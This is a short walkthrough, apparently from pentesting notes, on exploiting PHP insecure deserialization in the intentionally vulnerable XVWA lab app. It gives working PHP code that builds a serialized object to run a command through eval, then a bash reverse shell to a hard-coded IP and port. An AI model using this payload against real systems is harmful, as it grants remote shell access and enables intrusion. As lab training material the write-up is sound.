PHP Insecure Deserialization

The webapp is XVWA and has a section on PHP Object Injection.

Viewing the URL shows that there is a serialized object.

Viewing the source code of the application shows that the inject variable is directly passed to eval.

Create a php file with the code below to create a serialised object and submit it to the web application.

<?php
    class PHPObjectInjection {
        public $inject="system('ps aux');";
    }
    $obj=new PHPObjectInjection();
    var_dump(serialize($obj));
?>

Now that we know the command execution works, its time for a reverse shell.

<?php
    class PHPObjectInjection {
 public $inject="system('/bin/bash -c \'bash -i >& /dev/tcp/192.142.148.2/54321 0>&1\'');";
    }
    $obj=new PHPObjectInjection();
    var_dump(serialize($obj));
?>

Make sure to URL encode they payload and then profit.

PreviousNull Origin Exploitation NextJava Insecure Deserialization II

Last updated 2 years ago